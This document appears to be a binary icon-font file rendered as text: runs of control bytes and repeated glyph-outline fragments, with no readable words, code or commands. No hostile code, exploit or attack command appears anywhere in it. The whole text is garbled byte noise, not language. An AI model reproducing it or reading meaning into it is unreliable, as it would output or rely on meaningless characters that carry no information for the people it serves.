$#LH?�5G(1#.	�$m 9K++K9  9K++K9 ���0<��%7'./#'737>77'>?5'.'"&546325'.'7'.'7'.'7'./#'''77737>77'>77'>77'>?"&54632l)-:	@	:-)FF)-:	@	:-)FF�%%%%C9C'.8
;%@%;
8.'C9CC9C'.8
;%@%;
8.'C9C��:QQ::QQ�:-)FF)-:	@	:-)FF)-:	@	�%%%%�@%;
8.'C9CC9C'.8
;%@%;
8.'C9CC9C'.8
;%kQ::QQ::Q����%&"'!'#72?64'��'�.���DΠθ.(q�.�.�DΠθ'��q(	����/3'#3#3#5#3#3#%37'	&"2?64''7�@��@@��@@�@���@@@�@�@2��(<|(<��@��@���@@�@@@���@�@�N|<(��<(R�@����)#54&#!"#"3!2654&%!!##5#53533��&�&�5KK55KK������������&&�K5�5KK55K���@��������=5#.'3'#4&1>54&#"0#'3#3#73326737#>7�%�F>:�pPPp�:>F�%��|F>:p,�JJ�,p:>F|�@7a(�OppO���(a7@"A���:EE:�A"����"32>54&'7.#�]�zFFz�]]�zF@SgyB��Fz�]]�zFFz�]6e-�7\A$�@���N7!!3"&5463:37.54632:3:3.54632#*##"&5467'*#*##�����(88(h8((8h�	8((88(�	8((8hh8(@���8((8�(88(�*(88((8��(88(��(8@7!!3#3#3#3#�������������������@����@���@#'7;#";2654&#3#";2654&#3#";2654&#3 �

�

��@�

�

��@�

�

��@
��

@
���
�@

�
�@@
��

@
����$0<5!#3267#"!4&+5>7326=#"&=3%#"&'>=3@���pP"g=@5KK5@=g"Pp���0Dt
�D0
t���Pp2D
�K55K�
D2pP��D0@@9t0D9@@����*:TX\`d>7>76&'.#".'.#"#3!3#'>32#>%&67>312&"'.'.'!!5!5!!!7!5!
 -%K 1=2-:,%	+$�@@�b1 !S&34�q	 
)3O���@��@��@�
<"<"2}11y,&s,��@��N !.+k	

O3)��� ���� ����@�)8.#!"#"3!2654&+>7>54&%!!<5467
�$/,"T/`

@

`/T",/����		1r<O�8+9��



H9+8�O<r(Y//Y(���}@#>'.#!"#"3!2654&+!'y	�@	9`

@

`�d��d

�r��



~������7;#54.#"32>=32654&%.'>7>32#"&#53��<i�PP�i<<i�PP�i<�%%��"		",k99k,"		",k99k����`!:,,:!��!:,,:!`%@%>				��� ����5";26'>54.!####;;26'3265#�(F4T@ $ $ @T4F]5((5
S$ $S
�#=R.Oy��&&yO.R=#��@��@�`
�&&
����=.#">30030&73267>7>7>74&'�)hu�BQ�|c" ##���s_��D/
�*K"X�/)5+<V=:2"5M1/m>7zAk��NHvW$S.$T`k;�j()$`4(TRO#���	#0>	1%5�����Ccp,���@@����
�bH2taA��@@���S2!.54>>5#53.'#53.'.'#5.#"#53#3#333>j��P&Fa;�;aF&P���-ZUj@#R-@  @-R#@jUZ-	�%6%�	�P��jH�s^!!^s�Hj��P��CJO)@"@@	#2FUUF2#	@@"@)OJC����5G"32>54.>54.'>7>32#"&7+"&=4673j��PP��jj��PP����	2F)8.7�MM�7.8)F2	.j99j�

@

 �P��jj��PP��jj��P��1/UF5?s/6::6/s?5FU/1  �@

@�
����6%7>726376&/."?065>??6&'��g
�"@'ag�!
@'�
2	,�'A"�gb'@
!�
h��	3	O����2&67>10>'6.'.1.'A3 (+(
%C^,
'�]B�%a[C	9N((&	8jQ@k�9?hRD!RPE/���Lu�(q u�R<}yq20L.+QPQ+<h`[.D���� %532654&#!";3!26%53!��� 

��

 ��7Ij�jI���



��[���Y��@����7!#"&5!32>5#"&'.'33267>=3��@pPPp@�@Fz�]]�zF�5�KK�549$o#(%&`55`&%(#o$94���PppP@��]�zFFz�]��59955�JE��5`&%((%&`59��J�5@����	
-13!265#3#3#3#3#54&+"#"!54&!#53�&@&�@@�@@�@@�@@����@������&&�����@��@��@�@PPPP?@����
!!%5!!7!5!#53��@����@@����@�����@@�@@#;!54&#!"!"3!2654&%81!81!#+"&=!+"&=#5!��&�&�&&�&&���@�
@
��
@
���@&&@&��&&@&@@�`

``

`@���'''.3?5!����۬&Z&�ۀI��@��@�I�۬&Z&��ۀ����@�@'+#54&#!"332654&'!32654&'3%53��&��&@Q	K55K	b	K55K	Q���`��&&�@!5KK5!!5KK5!������!###!!%3�@�� � ��@ @�� � @����6����4632#"&%'#%37�8((88((8�J�n@�nJ�<��<�`(88((88��<��<���W��a����)5?JU#.'5##335>73'#.'5"&54632#>3.'5>73e
=\uC�Cu\=
ee
=\uC�Cu\=
e�d>)(G9(��%%%%[)>d	(9G�d>)(G9(	Y)>d	(9G(Cu\=
ee
=\uC�Cu\=
ee
=\uC�)>d	(9G�%%%%Yd>)(G9(��)>d	(9G(�d>)(G9(	@����	%0%6&>7%��@�@����	0c�zz�c0	�H�H���G9��9G�^���;;���^�����	!	!�������������@����-1#"&'.5467>7532>54.%3#�2.00.-u@@u-.00.2EvU0Fz�]]�zF0Uv����-�"-u@@u-.00.-u@@u-"�Sp�L]�zFFz�]L�pS��Y�''7''7'2?>[�f�[�sWWs3�D$F-�B�9yuk�[�f�[�sW�Ws��+kuy9�B�-F@����"06!4&#"!"3!2654&%2#"&546!33!26=3'7%���K55K��

@
�S%%%%���
�
��@�:�:@5KK5
��

@
@%%%%��`

`�e�:r�:@���)%!!!!!!'#5#53#575#53#535#535#5�����������@@@�����������������@��2@�<2@��@@@@@���!!%!!!!%!!!!%!!����������������������������������#/!!!!!!4632#"&4632#"&4632#"&������������K55KK55KK55KK55KK55KK55K������@5KK55KK��5KK55KK��5KK55KK���UY]ae%#54&#!5326=4&+";!"#";26=4&+5!#";26=4&+5!#";26=4&#53#5353#53�B.�����.B����܀�����������.B����B.���������������@���@�@@�!!!!!!@����������@�@�@`!!!!!!75'�������������@�@�@��@��@`!!!!!!7�����������@�@����@`!!!!!!7�����������@�@�����$4&'.#".#".#"3!26L9&AU19a!7 8N	(G55G(�Hf.>^0U?$1*N7
4G((G5f@(/.#".#".#";732654&''3533{&AU19a!7 8N	(G55G([��oHfL9������X0U?$1*N7
4G((G5��fH>^�(���@�&->54&#".#".#";!532654&#5#7|^B
d@Be$5]F((F]5��B^L������>	B^:KN<(F]55]F(��^B;X����"(>54&#".#".#"3!2654&'77|^B
d@Be$5]F((F]5`B^L��@`�@�	B^:KN<(F]55]F(^B;X�@`�@�#'#!5!!##	���ࠀ��@��  ���@@�@���� �
7!!%!5!!5!%	##����`  �@@�@@��� ����	33!!#53����`� �@���������@��!!#53	##� �@���`����@����@����%,8DKSYdou~����"32>54.>73##>73!#53'5#'>7>7#>7#>73.'373#..'.'.'53'537.'3#7#.'%>7#>3.'.>73�c��KK��cc��KK����
p���
p�	���
&��&
�u�	���
�1��	�
&P&
���	Qp
�@`& :�{: &`)`& :y: &`�K��cc��KK��cc��K��A!!@@A!!@@!�@�+)R+�)��!@��@!!A��@��+)R+�)��!@�!A@!�,M)#F)M,#�
,M)#3)M,#���c"32>54."&'>=4&#".5.+".5467326?>=>323:3j��PP��jj��PP��j/Y)�
*TB)�

n,F3u�A!5c,F&IQY�P��jj��PP��jj��P�@`
%,%
�	7�O_j94`,�M	
G&&GE_wF 1#S����/\"&'.46?>32"'&4?64'.#"#"&'.46?62326?64'&4762#�
#$$#�#Y11Y##$$#X,X))33�))
�1Y##$$#X,X))33�))+#$$#�#Y1D$Z^Z$�"%%"$Z^Z$W+X)t)�)t)+��%"$Z^Z$W+X)t)�)t)+$Z^Z$�"%��� 3#267#"&'.#">32��@>ff>>ff�#d9Hw!!wH9d#��}�b�~]}H'27>4&'."01267871'01"&'.46787162"'&47�A��(((s(�!""!"UXT"�g/////v{v/A��"TXT!"!!"�(r)((�z
'


EyA��(r)((�"TXU"!""!�g/v{v/////A��"!!"!TXT"�(()r(�z

&
E�=I"32>7.#"&'.'>7>732>54&'1#"&54632T��j$$j��TT��j$$j���.KK.8�CC�8.KK.(F]55]F(�8((88((8/TvGGvT//TvGGvT/�M--M$&&$M--M,5]F((F]5,6(88((88��NZ#5##3353#"&'.'>7>732>5<1.'.#"32>7.'%2#"&546�������K.8�CC�8.KK.(F]55]F()F3 T��j$$j��TT��j$
 1�@(88((88@������!-M$&&$M--M,5]F((F]5.@O,/TvGGvT//TvG2
~8((88((8�@'P!!!5.#"32>7.'!2#"&546#"&'.'>7>732>54&'������ T��j$$j��TT��j$N0�:(88((88�8�CC�8.KK.(F]55]F(.KK.@�@|/TvGGvT//TvG8a'8((88((8��$&&$M--M,5]F((F]5,M--M�&7C`&".#"3267642.546>7>7.'%4&'32>7#"&'32>7.'�(�'R+T��j$X6�		`�� 1
z%8��K.=(B���'5]F(>E.KK.8�C9M-`2T��j$"c=��/TvG>i(�(`(��%z
1 (8�-M,)K=F)F'��(F]�EM--M$&M/TvGCq*���@�	�@@��@�������
	'!7!@@���@@@��@������@
���
)7FTcr��%2#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?"32>54."&54632%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-=5]F((F]55]F((F]5B^^BB^^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.�(F]55]F((F]55]F(�`^BB^^BB^���"32>54.4>3".j��PP��jj��PP���<i�PP�i<�P��jj��PP��jj��P�P�i<�<i�
���(6DR`n}�"32>54.22#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?5]F((F]55]F((F]5B^^B%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-�(F]55]F((F]55]F(�`@^BB^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.���
%
%%7'?������<<<<��*��pp��*33A��3�����`���v��$��$�����
%
%%'������<<<<�p��*�33A��3�����`���;�$��v���
%
%%������<<<<33A��3�����`����".#">54.�(J?22?J(8bI*f��NJ��i*Ib�2A""A2*Ib8q���po���m8bI*��� 2.54>32'7>3�8bI*i��JN��f*Ib8-R"N�`�><�*Ib8m���op���q8bI*&|�����]@����#"&54632#"333334&@8((88((8�%@P P@%`(88((88�%��������@%����&#"&546327'.#!"733333'7@8((88((8�1���1o&�{@ @{�&o`(88((88�8#��$�Z���@��@�Z����)D#"&54632#"&54632#"333334&7'.#!"733333'78((88((8@8((88((8���%@P P@%�1���1o&�{@ @{�&o`(88((88((88((88�%��������@%�#��$�Z���@��@�Z����';GS2>54.#"2#".54>2>7#".''4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�V+UQL#7Vo??oV7#LQU�%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�	 CtV11VtC �(88((88((88((88���+?"32>54.2#"&546!2#"&546".'32>7j��PP��jj��PP��V%%%%��%%%%�?oV7#LQU++UQL#7Vo�P��jj��PP��jj��P�8((88((88((88((8��1VtC  CtV1���'3?Q2>54.#"2#".54>4632#"&%4632#"&#".'7326j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%@R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��2#9))9#21<<���+>"32>54.2#"&546!2#"&546".'73267#j��PP��jj��PP��V%%%%��%%%%�,QF:Rf==fR:FQ,�P��jj��PP��jj��P�%%%%%%%%��)9#21<<12#9)���'3?L2>54.#"2#".54>4632#"&%4632#"&##"&=!5j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%�@8((8�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�@`(88(`@���,8"32>54.2#"&546##"&=!5!'"&54632j��PP��jj��PP����%%%%�@8((8�@%%%%�P��jj��PP��jj��P�%%%%��`(88(`@�%%%%���'3?R2>54.#"2#".54>4632#"&%4632#"&'>32.#"j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�N2#9))9#21<<1���+="32>54.2#"&546!2#"&546.#"'>32j��PP��jj��PP��V%%%%��%%%%�f==fR:FQ,,QF:�P��jj��PP��jj��P�%%%%%%%%��1<<12#9))9#���';GY2>54.#"2#".54>>7#".'64632#"&%".54632.j��PP��jj��PP��jV�qAAq�VV�qAAq�u4]J6:Xq@,SI<GU^�%%%%��2
8((8
2@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��
"-8 ?mP.*<$	q(88((88!!���1F"32>54.2#"&5462.#"&6546".'67>7#j��PP��jj��PP��V%%%%��-98##89�,SI<GU^14]J6:Xq@�P��jj��PP��jj��P�8((88((88''��*<$	

"-8 ?mP.���'5=AIk�2>54.#"2#".54>;2>=.'.53#535381267>323267>54&#"3!81267>323267>54&#"j��PP��jj��PP��jV�qAAq�VV�qAAq��(F]5�5]F(�@$�����$���**D00D�**D00D@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�`@5]F((F]5@�F&����&F,	$$			0DD0			$$			0DD0		���4V]ah"32>54.2#"&'.#"#81"&'.546!2#"&'.#"#81"&'.54633.3753j��PP��jj��PP��V0D**D��0D**D0��)G3�@�3G�P��jj��PP��jj��P�D0						0DD0						0D���/AP���-PA/���'IY2>54.#"2#".54>2+"&5#+"&=46;235463267#"&'7j��PP��jj��PP��jV�qAAq�VV�qAAq�v
&�&�&�&
�
�
`Ft"6:FQ,$E"4@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�
`&&&&`

  
�D8!#9)7
���$F"32>54."&'73267#+"&5#+"&=46;23546;2j��PP��jj��PP��j$E"4Ft"6:FQ,@&�&�&�&
�
�
�
�P��jj��PP��jj��P��7
D8!#9)�&&&&`

  

���'9Up2>54.#"2#".54>.#"'>32#"&5<1>7>36!>20#"&5467.'.j��PP��jj��PP��jV�qAAq�VV�qAAq�f==fR:FQ,,QF:


	%%4+
�
+4%%	


@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�S1<<12#9))9#�
	
%%$0







0$%%
	���.I["32>54.>7>36#"&5<%>20#"&5467.'..#"'>32j��PP��jj��PP��*4+



	%%��
+4%%	


�f==fR:FQ,,QF:�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�1<<12#9))9#��7Jv�"&5<1>7>36#%.7>20#"&5467.'267#".'734&'.#".'32>54&'>".54>32�%4+



	%��


+4%%	
�=fR:FQ,,QF:Rf=
[: INT,,TNI :[
#  #P��jj��P#  #�V�qAAq�VV�qAAq�%$0




	
%�




0$%%
	�_<12#9))9#21<�"A:X''X:A"7d(8�Ej��PP��jE�8(d��Aq�VV�qAAq�VV�qA��+Fat4&'.#".'32>54&'>>7>36#"&5<%>20#"&5467.'.".'73267#
[: INT,,TNI :[
#  #P��jj��P#  #�@4+



	%%��
+4%%	


,QF:Rf==fR:FQ,�"A:X''X:A"7d(8�Ej��PP��jE�8(d��$0




	
%%e



0$%%
	��)9#21<<12#9)���'3?K2>54.#"2#".54>4632#"&4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�*K55KK55K%%%%��%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��5KK55KK�(88((88((88((88���+7"32>54."&54632"&54632"&54632j��PP��jj��PP����%%%%�5KK55KK�%%%%�P��jj��PP��jj��P�@8((88((8��K55KK55K�8((88((8	���'3?LXdqu2>54.#"2#".54>#"&54632'2#"&5467"32654&##"&54632'2#"&5467"32654&#!!j��PP��jj��PP��jV�qAAq�VV�qAAq�*



 (88((88(B^^BB^^B`



 (88((88(B^^BB^^B���@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��


S8((88((8@^BB^^BB^�


S8((88((8@^BB^^BB^�@@���+7;G#"&54632#"&54632"32>54.4632#"&!5!7"&54632�



@



�j��PP��jj��PP����8((88((8�� (88((88 






�P��jj��PP��jj��P�`(88((88��@�8((88((8���'3?Z2>54.#"2#".54>4632#"&%4632#"&3&'.#&6767>'j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%VA96>xH%"#A96>xH%"#@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��6a8>%"?#6a8>%"?#���+E"32>54.2#"&546!2#"&546&'.#&6767>'3j��PP��jj��PP��V%%%%��%%%%�>xH%"#A96>xH%"#A9�P��jj��PP��jj��P�%%%%%%%%��8>%"?#6a8>%"?#6a���'3?C2>54.#"2#".54>32654&#"32654&#"!!j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�e@���#/"32>54.!5!2#"&546!2#"&546j��PP��jj��PP���@%%%%��%%%%�P��jj��PP��jj��P�@�%%%%%%%%���'3?Qb2>54.#"2#".54>4632#"&%4632#"&&"3>5&'!62#.56j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%$P b\B.L"��P b\B.L@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�P"@& "P"@& ���+S"32>54.2#"&546!2#"&546"&'.5#.56762467627&j��PP��jj��PP��V%%%%��%%%%� b\B.L"PP"K/B\b�P��jj��PP��jj��P�%%%%%%%%�Y$$"@& "$$" &@"���'+7C2>54.#"2#".54>'4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�@�K5%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�L�L�%%%%%%%%���+0"32>54.2#"&5464632#"&'%j��PP��jj��PP��V%%%%�[%%%%K��K�P��jj��PP��jj��P�%%%%@%%%%�5L�L����'3I^2>54.#"2#".54>#"&54632"&'&""'&4762#!"&'&""'&4762j��PP��jj��PP��jV�qAAq�VV�qAAq��K55KK55K�6

		"j"		@6

		"j"		@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��B^^BB^^
		

!!

		

!!

���(4I"32>54."'&4762#"&'&""&54632#"&'&""'&4762j��PP��jj��PP����

		"j"		6�5KK55KK�6

		"j"	�P��jj��PP��jj��P��		

!!

��^BB^^BB^�		

!!
���/=GKUt�.#&3265<1.'"32>54.3!267#"&'7546;#"&533532#>=4&#!".54>32"032654&'>7>'.n+



	%%4�j��PP��jj��PP����	
�
	8�OO�8	pp	��@p		H/!� !/08Aq�VV�qA8�+4%%	



�




	
%%$0P��jj��PP��jj��P��0880H`	�		���	`		
`!//!`
	8�OV�qAAq�VO��

0$%%
	


���	
+Faq;5#"73#%#326=4&"32>54.>7>36#"&5<%>20#"&5467.'.#!"&=463!2	pp	���0pp		�j��PP��jj��PP��*4+



	%%��
+4%%	


B/!� !//!�!/0`	�		���	`	�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�5!//!`!//!	���'5C^lz��2>54.#"2#".54>#"&546;2!#"&546;2"&'.#""'&47>32"&=4632"&=4632%"&=4632"&=4632j��PP��jj��PP��jV�qAAq�VV�qAAq�v�

�
�3�

�
�%!!%

		MM		z






�3






@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��







�(		




@

@
�
@

@
�
@

@
�
@

@
���!/=Xft�"32>54.#"&=46325#"&=46327#"&546;2#"&'.#""'&47>327#"&=46325#"&=46327#"&546;2j��PP��jj��PP����







 �

�

%!!%

		MM	�







 �

�
�P��jj��PP��jj��P� 

@

�

@

`



�1		


e

@

�

@

`



@����>J�54&#".#".#"54&#"'.#"21#"3!26=4&+7>5#"&546325!.546322127>54632326546323265463232654632�8(


+!

!8((8�
(8�-

�

,I@



T����
�













`�(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�>J�%32654&'>54&'>54&'32654&#!7>54&#""154&+";26=3%"&546323'>3213!2#!"32#"32+"32+��(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�8(


+!

!8((8�
(8�-

��

,I@



T�"
�













@����>J�#"&'#"&'#"&'#"&5#"&54672417#"&=463!2+4&#"326'!32672617623265463232654632326=46323265�8(


+!

!8((8�
(8�-

�

,I@



T����
�













 �(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



�>J�%#"&5467.5467.5467#"&5463!'.5463221546;2+"&=#%2654&#"#7.#"1#!"3!2#"32#";2#"3`�(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



8(


+!

!8((8�
(8�-

��

,I@



T�"
�













����!/	!5"3!26'1.#1#"&54632'"&=4632����
�K%3f3%�K
@%%%%@%%%%c��W]��,@@,g��%%%%e%�%%�%���(=AE"32>7>54.'.#512#".54>3#3#*PKD--DKP**PKD--DKP*j��PP��jj��PP��*����`-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P�@�������8M3#2#575!57"32>7>54.'.#512#".54>���%������*PKD--DKP**PKD--DKP*j��PP��jj��PP���@%��@�@��-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P���#!4&+"!"3!;265!26=4&�
�
��

`
�
`
@`

��
�
��

`
�
@@3!26=4&#!"
�

�@
 �

�
���-A46;2+"&5!535#533"32>54.".54>32�  ��@@�@�j��PP��jj��PP��jV�qAAq�VV�qAAq�� �P@�@��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���'3"32>54.".54>32'77'7j��PP��jj��PP��jV�qAAq�VV�qAAq�J��`��`��`���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���`��`��`�����(4A.#"32>7>54.'>32467#".5j$T\c33c\T$$8&&8$$T\c33c\T$$8&&8$&!��/q>O�i<�&!/q>O�i<*$8&&8$$T\c33c\T$$8&&8$$T\c33c\T$��>q/!&<i�O>q/��!&<i�O����S%81	81>76&/.81	81.'&81	817>781	816?>'.���7�	���	�7���	77	��77	���7�	���	�7���	 @	'	`� ���@� ���*V
%7	''��s�������!Y�R�Y*����������X�Y�X@����
048>334&+"33#%5#";5#54&+326=4&#26#535#53	7��@&�&@��@�&&���&��&@�����`�R�`���&&�����@&��&@@``&�@&`&&ƀ@���@ F�.@���!5!55!3!%!#���@�������@@��@�����������@��@����5!5!5!%!#!!5��@�������@�@��������@���������'*"32>54.".54>32
j��PP��jj��PP��jV�qAAq�VV�qAAq������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA������'+/"32>54.".54>323#3#j��PP��jj��PP��jV�qAAq�VV�qAAq��ꀀ���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`��������'+"32>54.".54>32!!j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`�����'*."32>54.".54>32%3#j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*.2#".54>2>54.#"%#3j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*-2>54.#"2#".54>'7'7j��PP��jj��PP��jV�qAAq�VV�qAAq�����@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�����������'*-"32>54.".54>32j��PP��jj��PP��jV�qAAq�VV�qAAq��������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA@��@���@@@	����@�����@�@!!!!�@���@��@���@�@!!��@��`� @@���� ��@�@@��`�`` %��@``@�����@���@�@73��@@����@��@��@�@@��@���@�@#������@@@�`��@�����@��`@�@%3�@��@��@�@@��@@@#���@@�`�����`@@7!!	!�����@~#C\w%"&'&47>54.'&4762#'"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>z	!3""3!((=))=(	�
1111'/  /	�	(,--,��s

s�			&(!LSZ..ZSL!(([el88le[(Z'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
p~8S%"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>�
1111'/  /	�	(,--,��s

s�			�'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
G~3%"&'&47>4&'&4762"&/#"&546;7>%	(,--,��s

s�			�(MPM(,qtq,��
@
�
��
�~%"&/#"&546;7>��s

s�			�
@
�
��
�~*#'#57'5373"&/#"&546;7>�UkkUkkUkkUk�K�s

s�			UUkkUkkUkkUk�@�
@
�
��
~&##5#53533"&/#"&546;7>���������s

s�			��������
@
�
��
~!!"&/#"&546;7>�`�s

s�			����
@
�
��
���!	!3!5	5!#�����������������������2.#"34>32!#".'7!732>5z#U`j8j��P`Aq�V.WOE�`�&Aq�V.WOE����#U`j8j��P&>+P��jV�qA$3 �`���V�qA$3 ����&>+P��j��';P%"&/#"&'.5467>327>32'3267>54&'.#"%"326?'.#0X"ff"X00X""$$""X00X"ff"X00X""$$""X�5555g��555gg5�$"gg"$$""X00X""$$"gg"$$""X00X""$�55f�55ff���`%#'737'#"'.+3#326?;7'e��e��
	��	
������
	��	
��������
	��	
����
	��	
������7	7	! ��� ����  ����	!!!�  � �� ����		 ��� ����� ������	!!� ���������		!���� ���� �� ����!!!���� �����	'	� ��@ ���  ���!! ����  � �@m@!%32654&#!"1326=326764m���%%��!%%		�%%
��%%��
		
6�mm	&"2?3265326764'm��6��6�%%�		-@��6��%%e�
		
6�S�@"732654&'.#1!";27�%%
��%%��
		
6S�%%�!%%��		@S�-%64'&"!"3!2m@��6��%%e�
		
6S@6@6�%%�		�@�@"#"3!267>514&#".#"��%%�!%%��		��%%
�%%�
		
6�m�	"'&476246327>32m��6��6�%%�		S��@6�e%%���
		
6�@�-"	54&#"31!2654&+>54&'&"��%%
�%%�
		
6-���%%��!%%		SS�-%&4762!2#!"���@6�e%%���
		
6S@6@6�%%�		���'-32>54.#"#".54>327	7P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-"32>54.".54>32'	j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ����'-4.#"32>%4>32#".7	'P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-2>54.#"2#".54>'	7'j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z����3#!3#!!'7%!5!5�@@�@@@@��@����@������@�������@�
"&*.33'3#73#73#3#73#73#'3#%3##5%!!�@���� ``�``�@@�@@```�``�@@@@���@������@@@@@`�`@@@@�`@`��@��@�
"&*.##7#5%!!3#73#73#3#73#73#'3#%3#@��������@��``�``�@@�@@```�``�@@@@��������@���@@@@`�`@@@@�`@` ����%@D%##7!"&'&47#"&5463!232#.#"326?37>'%7#@������	��

	��

]�		�		7�7	��LL�����	N

	��

n�

��		nn	��� ����%@C%##7!"&'&47#"&5463!232#.#"326?37>'%7@������	��

	��

]�		�		7�7	��LL����@	N

	��

���

��		nn	��� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������@
`


��
�
�
�


�
@� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������
`


��

�
�


�
@� ���
%##7'!!!!!!3#@���� @����@@��������@�@�@� ���
%##7!!!!!!3#@���� @����@@���������@�@�@��@�@/:EIT_%"&=##"&546;5#"&54632354632+3232654&#!"326=735#732654&#"%";54&�B^�^BB^^B``B^^BB^�^BB^^B``B^^�8((88(�@(88((8@���`(88((8��(88(`8@^B``B^^BB^�^BB^^B``B^^BB^�^BB^`(88((88((88(`@�@8((88(`8((8`(8�@^7(%!"&5#"&'&6762+%!46;'32���
�
@

@
���
S��S
@
`		@		��		��
@`
��
�@"&/'.7>32���	

	�

�	
��
		
�
	@��&%!"&'!"&5463!232#!"&5463!2��	���

@	��

��

@
�
	-


	��

@



���!"3!2654&'7��5KK55KK��Z�3Z�K5�5KK55K���Z�2Z���!"3!2654&!!��5KK55KK5��K5�5KK55K�����'3"32>54.".54>324632#"&j��PP��jj��PP��jP�i<<i�PP�i<<i���pPPppPPp�P��jj��PP��jj��P��<i�PP�i<<i�PP�i<�PppPPpp���"32>54."&54632j��PP��jj��PP��j5KK55KK�P��jj��PP��jj��P��K55KK55K���'"32>54.".54>32j��PP��jj��PP��jP�i<<i�PP�i<<i��P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���7'!5##3!3535#!@�@��@�������@��@@��@�����������@@�����#37Gm�#";26=4&326=4&+"73##";26=4&#53%#";26=4&7#"&'.=4&#!";23!2654&#!"&'.=4.+"&'.5467>3!2;2@�&&�&&f�&&�&&�����&&�&&���&&�&&&@@u-.0K5�5KK5@@u-.0K55KK
		
�
		
<i�P@
		

		

		
<i�P@
		
@&�&&�&�&�&&�&����&�&&�&��@&�&&�&�0.-u@@5KK5�5K0.-u@@5KK55K��
		

		
@P�i<
		

		

		
@P�i<
		
���/?OSW[_cgkosw{��+"&=46;2+"&=46;2+"&=46;2+"&=46;275#'#37353#3#3#3#3#3#3#%3#'3#'3#3#73#%3#'3#�``@``��``@``�p0pp0pp0pp0�@@@@@@@@@@@��@@@@��������@�������������```�````p0pp0pp0pp0��@����@���@��@@@@@�@@@@@@@.��9Ua}.'>'./.'.>767>&81'.'&67>7>"&54632&'81.'.7>76�AFDP�
��
�PDFADFA��AFD�@44�


s44'8| 0'��T'0��|8''RK=7'��'7=KRQ$$6#$6 



��$$6$#6���B"326554.>7>32#".'.'.'>7j��P�K55K�P����2!KQW,,WQK!22!KQW,,WQK!2�,:!`����%%@�`!:,�
				

				
e����%"&#"3.54670
!37#73267 DhFq�m5IH
eJ KxY=l�,�4-U&.P=�;a}AM;&7�o����#��	7k	��f�a%81#5467>7>323267>54&'.'.#"#3+!5#"&58132!5"&5��	





':.S$$8~~	&�D1�8%&E!X�=n

(

"
<&#w<H��6(
88&SN&,�,$
88A�\�v%"&'.5461.+"#"&#"+";21#">326&#"&'.'546;>54&+"&=4>3281#">326&#WL
@#,!EgC!<NI
-F-*G,L�
�%5"/GI
-F-*G,+@$=C!"6`�P.1]I,<%$@$�!
